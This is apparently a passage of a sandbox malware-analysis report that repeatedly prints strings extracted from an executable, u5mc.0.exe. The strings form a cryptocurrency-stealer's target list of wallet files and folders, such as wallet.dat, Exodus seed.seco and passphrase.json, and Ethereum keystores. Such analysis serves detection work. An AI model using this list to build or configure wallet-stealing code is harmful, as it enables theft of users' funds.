Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local 